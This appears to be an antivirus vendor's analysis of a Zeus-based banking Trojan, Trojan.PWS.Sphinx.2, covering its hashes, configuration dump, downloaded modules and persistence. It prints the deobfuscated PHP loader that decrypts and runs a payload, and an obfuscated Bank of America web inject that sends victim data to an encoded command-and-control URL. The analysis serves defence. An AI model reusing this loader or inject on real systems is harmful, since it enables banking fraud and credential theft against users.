SHA1:
- packed 4b86b7ec7371a98041391203d17fe731602c8fc0
- unpacked ac745b2c36fd0529e7e27ba98e1032ad7a108d22
- client32.dll ff82700ee26bbaf5a3357c5f5070fda9f80f9993
- client64.dll c31d5caf4927cd5885112649a762a89c812913e0
- vncdll32.dll a5e2fd98f1e8466700e20b690eed359f79a353bf
- vncdll64.dll ce6a35afd9332439ac852f51fd9b60d7fd85362b
A banking Trojan based on the source code of Zeus (Trojan.PWS.Panda) and used mainly to perform web injects. The Trojan’s code is obfuscated. When launched, the malicious program embeds itself in the process of Explorer (explorer.exe) and decrypts the loader body and the configuration file in which the command and control (C&C) server’s address and encryption key are hidden.
6C 6C 31 75-63 76 68 75-77 6D 64 74-67 78 37 76 ll1ucvhuwmdtgx7v
71 72 35 65-31 74 36 39-33 69 65 67-67 6D 33 38 qr5e1t693ieggm38
00 78 74 34-6F 78 77 70-61 66 66 6E-38 61 64 38 xt4oxwpaffn8ad8
66 69 77 79-64 37 74 79-74 69 7A 7A-38 66 6B 75 fiwyd7tytizz8fku
39 76 77 69-69 65 6A 6C-68 35 6F 66-79 78 64 7A 9vwiiejlh5ofyxdz
32 67 6D 74-64 35 70 6B-72 34 65 77-6F 78 69 69 2gmtd5pkr4ewoxii
69 6F 67 68-73 36 38 31-30 31 31 37-00 6C 6B 78 ioghs6810117 lkx
38 69 6E 61-72 39 33 75-34 36 69 65-6A 68 70 6E 8inar93u46iejhpn
6E 62 74 71-78 72 32 73-73 37 6F 72-6A 6D 62 67 nbtqxr2ss7orjmbg
37 66 6D 77-66 7A 69 69-68 68 70 36-35 7A 78 78 7fmwfziihhp65zxx
6F 6D 78 33-34 66 74 79-73 64 70 32-72 38 69 68 omx34ftysdp2r8ih
74 74 70 3A-2F 2F 6E 6F-6F 6D 64 6F-6F 6D 73 61 ttp://noomdoomsa
64 69 6B 2E-63 63 2F 72-74 64 2F 72-6F 6B 66 6C dik.cc/rtd/rokfl
2E 70 68 70-00 6A 32 6A-6E 63 65 6B-77 69 6B 75 .php j2jncekwiku
38 73 75 72-70 64 7A 78-33 32 39 6F-6F 68 39 63 8surpdzx329ooh9c
38 6B 6B 6D-39 70 69 62-36 70 79 37-6B 62 74 6A 8kkm9pib6py7kbtj
71 73 7A 70-62 72 35 6B-36 35 6D 74-61 6D 6D 6F qszpbr5k65mtammo
6F 6F 39 69-6B 75 36 67-6A 65 64 38-6D 6A 67 6D oo9iku6gjed8mjgm
32 39 71 6A-72 35 39 39-6D 6E 72 77-68 34 61 62 29qjr599mnrwh4ab
65 70 36 78-68 32 71 37-34 64 36 78-33 73 73 63 ep6xh2q74d6x3ssc
61 64 72 67-69 65 66 38-32 6B 71 69-64 61 36 68 adrgief82kqida6h
7A 33 71 71-63 77 38 6A-66 34 77 69-79 66 34 68 z3qqcw8jf4wiyf4h
6D 37 34 38-39 6F 37 31-31 37 39 72-6F 36 7A 32 m7489o71179ro6z2
6D 78 33 73-63 31 32 39-78 34 69 6D-69 77 75 38 mx3sc129x4imiwu8
38 77 36 37-61 34 6E 77-32 6E 79 71-63 6E 33 73 8w67a4nw2nyqcn3s
70 63 62 35-66 6A 35 39-61 65 6E 6C-72 36 6A 77 pcb5fj59aenlr6jw
37 66 39 69-69 6E 70 39-67 67 71 71-72 33 64 66 7f9iinp9ggqqr3df
68 77 6F 33-03 00 0D 00-75 6B 61 03-00 0D 00 73 hwo3♥ ♪ uka♥ ♪ s
79 73 7A 66-77 34 66 68-64 48 59 32-38 68 41 75 yszfw4fhdHY28hAu
69 6B 7A 68-00 70 75 61-32 6B 78 75-70 37 6C 68 ikzh pua2kxup7lh
70 72 33 61-37 69 31 75-78 6F 7A 33-72 61 68 39 pr3a7i1uxoz3rah9
70 37 64 66-75 6C 6E 39-71 70 79 61-75 62 6D 6A p7dfuln9qpyaubmjAll the information shared between the Trojan and the C&C server is logged. The data is transmitted in the form of POST requests.
First, the Trojan requests that the modules be downloaded from the C&C server. In reply, the server sends it a container that includes plug-ins.
Currently, the following four modules are being downloaded from the server:
- client32.dll—a module for performing web injects on a 32-bit OS.
- client64.dll—a module for performing web injects on a 64-bit OS.
- vncdll32.dll—a VNC module for a 32-bit OS.
- vncdll64.dll—a VNC module for a 64-bit OS.
The last two modules are used to launch a VNC server that lets cybercriminals connect to the infected computer.
In addition, Trojan.PWS.Sphinx.2 downloads a set of utilities for installing a root digital certificate that can be used by cybercriminals to carry out MITM attacks.
- certutil.exe
- freebl3.dll
- libnspr4.dll
- libplc4.dll
- libplds4.dll
- msvcr100.dll
- nss3.dll
- nssdbm3.dll
- nssutil3.dll
- smime3.dll
- softokn3.dll
- sqlite3.dll
The Trojan uses a PHP script to launch itself. For this purpose, it saves two files on the infected computer:
- php.exe
- php5ts.dll
The script code is obfuscated. When deobfuscated, it looks as follows:
<?php $GLOBALS['2132652578']=Array('imagecopymergegray','strpos','strncmp','file_get_contents','fgets','file_put_contents','exec','unlink','strlen','mt_rand','strtr','chr','ord','mt_rand','strrchr','strpos','bin2hex');
?>
<?php
function _499671292($thgwox){
$mwvttf=Array("\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd",
"\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd\x1c\xd3\xbf\xe0",
'fadrgfnjntmvfl',
'daz',
'',
'sqwwhirkltslkcv',
'fuwmz');
return $mwvttf[$thgwox];
}
?>
<?php
$iqegybr=648723321;//round(0+129744664.2+129744664.2+129744664.2+129744664.2+129744664.2);
while(round(0+1457+1457)-round(0+1457+1457))
imagecopymergegray($rhljwqh);
$trbedbh=_499671292(0);
$rhljwqh=_499671292(1);
$trbedbh=decodeString($trbedbh,$iqegybr); //C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy
if(strpos(_499671292(2),_499671292(3))!==false)
strncmp($iqegybr,$iqavsjx);
$rhljwqh=decodeString($rhljwqh,$iqegybr); //C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy.exe
$ebcpnbn=file_get_contents($trbedbh);
if($ebcpnbn){
$scfhmal=decodeString($ebcpnbn,$iqegybr);
file_put_contents($rhljwqh,$scfhmal);
exec($rhljwqh);
while(!unlink($rhljwqh))
Sleep(round(0+1));
$soizplh=round(0+621.8+621.8+621.8+621.8+621.8);
}
function rol($key,$seed){
$seed2=$seed&31;
return($key << $seed2)|(($key >>(32-$seed2))&((1<<(31&$seed2))-1));
}
function decodeString($buf,$key){
$out="";
$n=strlen($buf);
for($i=0;$i<$n;++$i){
$sym=chr(ord($buf{$i})^($key&255));
$out .= $sym;
$key=rol($key,8);
++$key;
}
return $out;
}
?>The following shortcut is used to execute the script:
%HOMEPATH%\start menu\programs\startup\php.lnk
An example of a performed web inject:
set_url *.bankofamerica.com/ GP
data_before
<body>
data_end
data_inject
<script id="loader" type="text/javascript">
document.body.style.display = "none";
(function(){
var _0x7f7f=["\x53\x43\x52\x49\x50\x54","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x3F\x72\x61\x6E\x64\x3D","\x72\x61\x6E\x64\x6F\x6D","\x26","\x61\x6A\x61\x78\x5F\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x65\x64","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x61\x70\x70\x6C\x79","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50","\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66","\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76","\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F","\x3D","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function sendScriptRequest(_0xade3x2,_0xade3x3,_0xade3x4,_0xade3x5){var _0xade3x6=document[_0x7f7f[1]](_0x7f7f[0]);if(_0xade3x3){_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]()+_0x7f7f[4]+_0xade3x3;} else {_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]();} ;_0xade3x6[_0x7f7f[5]]=false;_0xade3x6[_0x7f7f[6]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[7]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[8]]=_0xade3x2+_0xade3x3;document[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);} ;function scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5){return function (){if(_0xade3x6[_0x7f7f[5]]){return ;} ;if(!_0xade3x6[_0x7f7f[13]]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[14]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[15]){_0xade3x6[_0x7f7f[5]]=true;_0xade3x4[_0x7f7f[16]](_0xade3x6,_0xade3x5);_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);} ;} ;} ;function decode64(_0xade3x9){var _0xade3xa=_0x7f7f[18]+_0x7f7f[19]+_0x7f7f[20]+_0x7f7f[21]+_0x7f7f[22];var _0xade3xb=_0x7f7f[23];var _0xade3xc,_0xade3xd,_0xade3xe=_0x7f7f[23];var _0xade3xf,_0xade3x10,_0xade3x11,_0xade3x12=_0x7f7f[23];var _0xade3x13=0;var _0xade3x14=/[^A-Za-z0-9\+\/\=]/g;_0xade3x9=_0xade3x9[_0x7f7f[24]](/[^A-Za-z0-9\+\/\=]/g,_0x7f7f[23]);do{_0xade3xf=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x10=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x11=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x12=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3xc=(_0xade3xf<<2)|(_0xade3x10>>4);_0xade3xd=((_0xade3x10&15)<<4)|(_0xade3x11>>2);_0xade3xe=((_0xade3x11&3)<<6)|_0xade3x12;_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xc);if(_0xade3x11!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xd);} ;if(_0xade3x12!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xe);} ;_0xade3xc=_0xade3xd=_0xade3xe=_0x7f7f[23];_0xade3xf=_0xade3x10=_0xade3x11=_0xade3x12=_0x7f7f[23];} while(_0xade3x13<_0xade3x9[_0x7f7f[28]]);;return unescape(_0xade3xb);} ;
var bn = "US_" + "BOFA_2";
var bot_id = "%BOTID%_" + bn;
var sa = decode64("aHR0cHM6Ly9pbmJpd29vLmNvbS9hOHNkYXNkai9Ia2E5MGFsLnBocA==");
var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=0&u_login=&u_pass=&log=" + 'get_me_core';
sendScriptRequest(sa, req, function statusCall1() {
var element = document.getElementById("loader");
element.parentNode.removeChild(element);
} );
})();
</script>
data_end
...Moreover, the Trojan has a grabber—a module that intercepts data entered by the user into various forms and then sends it to the cybercriminals. For this, the Trojan requests the corresponding filters from the C&C server.
All the information required for the Trojan’s operation is encrypted and stored in the Windows system registry. Registry branch names are generated automatically using a special algorithm.
Modules are saved to a separate file with a random extension, which is also encrypted.
